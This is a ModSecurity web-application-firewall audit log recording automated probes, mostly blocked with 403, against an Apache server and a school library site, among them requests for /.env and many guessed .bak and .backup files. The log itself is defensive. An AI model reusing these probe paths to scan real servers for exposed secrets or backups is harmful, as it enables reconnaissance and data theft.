Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --340bb079-Z-- --7c5fd153-A-- [18/May/2025:11:01:18 +0700] aClbjkPRqak7bVuUS6cRdgAAAIM 103.236.140.4 53394 103.236.140.4 8181 --7c5fd153-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 --7c5fd153-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c5fd153-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747540878682321 801 (- - -) Stopwatch2: 1747540878682321 801; combined=313, p1=274, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c5fd153-Z-- --a0899e07-A-- [18/May/2025:11:50:54 +0700] aClnLvypzAd0elWOk7o7agAAAAg 103.236.140.4 53706 103.236.140.4 8181 --a0899e07-B-- GET /2021.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:59.0.1) Gecko/20100101 Firefox/59.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 122874072 --a0899e07-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a0899e07-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854482855 2435 (- - -) Stopwatch2: 1747543854482855 2435; combined=746, p1=301, p2=414, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0899e07-Z-- --a0855342-A-- [18/May/2025:11:50:54 +0700] aClnLkPRqak7bVuUS6cRhQAAAIM 103.236.140.4 53778 103.236.140.4 8181 --a0855342-B-- GET /clients.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118849545 --a0855342-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a0855342-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854483433 2762 (- - -) Stopwatch2: 1747543854483433 2762; combined=557, p1=270, p2=268, p3=0, p4=0, p5=19, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0855342-Z-- --d5dbe717-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc3wAAAMY 103.236.140.4 54044 103.236.140.4 8181 --d5dbe717-B-- GET /2011.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117876114 --d5dbe717-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d5dbe717-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854495596 2170 (- - -) Stopwatch2: 1747543854495596 2170; combined=600, p1=228, p2=350, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5dbe717-Z-- --ea89573a-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc2wAAANE 103.236.140.4 53774 103.236.140.4 8181 --ea89573a-B-- GET /website.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 OPR/56.0.3051.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 125843574 --ea89573a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ea89573a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854486288 11604 (- - -) Stopwatch2: 1747543854486288 11604; combined=613, p1=281, p2=309, p3=0, p4=0, p5=23, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea89573a-Z-- --ac267316-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc4QAAAMk 103.236.140.4 54052 103.236.140.4 8181 --ac267316-B-- GET /2018.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150142979 --ac267316-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac267316-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854496482 6095 (- - -) Stopwatch2: 1747543854496482 6095; combined=719, p1=298, p2=372, p3=0, p4=0, p5=48, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac267316-Z-- --d499cb5a-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc9QAAAM0 103.236.140.4 54200 103.236.140.4 8181 --d499cb5a-B-- GET /2013.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150437891 --d499cb5a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d499cb5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854503664 5126 (- - -) Stopwatch2: 1747543854503664 5126; combined=422, p1=188, p2=204, p3=0, p4=0, p5=29, sr=42, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d499cb5a-Z-- --48a11625-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DtgAAAFI 103.236.140.4 54848 103.236.140.4 8181 --48a11625-B-- GET /jsp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 119046150 --48a11625-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48a11625-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854507591 7292 (- - -) Stopwatch2: 1747543854507591 7292; combined=548, p1=322, p2=207, p3=0, p4=0, p5=19, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48a11625-Z-- --72529759-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DtwAAAFg 103.236.140.4 54864 103.236.140.4 8181 --72529759-B-- GET /engine.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/52.0.2871.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127491165 --72529759-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --72529759-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854513623 1941 (- - -) Stopwatch2: 1747543854513623 1941; combined=732, p1=366, p2=328, p3=0, p4=0, p5=38, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72529759-Z-- --756b6724-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DxgAAAE0 103.236.140.4 53718 103.236.140.4 8181 --756b6724-B-- GET /2010.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 147879198 --756b6724-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --756b6724-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854507612 12645 (- - -) Stopwatch2: 1747543854507612 12645; combined=544, p1=337, p2=187, p3=0, p4=0, p5=20, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --756b6724-Z-- --f0e20d10-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DywAAAEo 103.236.140.4 54850 103.236.140.4 8181 --f0e20d10-B-- GET /data.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118075868 --f0e20d10-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0e20d10-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854507740 13438 (- - -) Stopwatch2: 1747543854507740 13438; combined=562, p1=286, p2=250, p3=0, p4=0, p5=26, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0e20d10-Z-- --0e323147-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DyAAAAEg 103.236.140.4 53716 103.236.140.4 8181 --0e323147-B-- GET /home.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149848067 --0e323147-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0e323147-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854490735 32225 (- - -) Stopwatch2: 1747543854490735 32225; combined=693, p1=387, p2=285, p3=0, p4=0, p5=21, sr=157, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e323147-Z-- --9d9c2728-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5D1wAAAEE 103.236.140.4 53926 103.236.140.4 8181 --9d9c2728-B-- GET /2019.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.8.0) Gecko/20100101 Firefox/52.8.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118816777 --9d9c2728-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9d9c2728-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854490630 37701 (- - -) Stopwatch2: 1747543854490630 37701; combined=579, p1=312, p2=242, p3=0, p4=0, p5=25, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d9c2728-Z-- --19568633-A-- [18/May/2025:11:50:54 +0700] aClnLkPRqak7bVuUS6cRyQAAAJQ 103.236.140.4 54980 103.236.140.4 8181 --19568633-B-- GET /users.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.1.1) Gecko/20100101 Firefox/52.1.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152240131 --19568633-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --19568633-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854531232 4662 (- - -) Stopwatch2: 1747543854531232 4662; combined=1119, p1=500, p2=439, p3=0, p4=0, p5=180, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19568633-Z-- --ecaae655-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5D5wAAAEM 103.236.140.4 54942 103.236.140.4 8181 --ecaae655-B-- GET /orders.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5; rv:59.0.2) Gecko/20100101 Firefox/59.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634502 --ecaae655-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ecaae655-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854527155 8905 (- - -) Stopwatch2: 1747543854527155 8905; combined=578, p1=268, p2=287, p3=0, p4=0, p5=23, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecaae655-Z-- --904df951-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc4wAAAMI 103.236.140.4 54062 103.236.140.4 8181 --904df951-B-- GET /smkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149690336 --904df951-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --904df951-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854496606 41967 (- - -) Stopwatch2: 1747543854496606 41967; combined=1571, p1=329, p2=1210, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --904df951-Z-- --7262dd5c-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxdAwAAAMw 103.236.140.4 53770 103.236.140.4 8181 --7262dd5c-B-- GET /smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127933779 --7262dd5c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7262dd5c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] 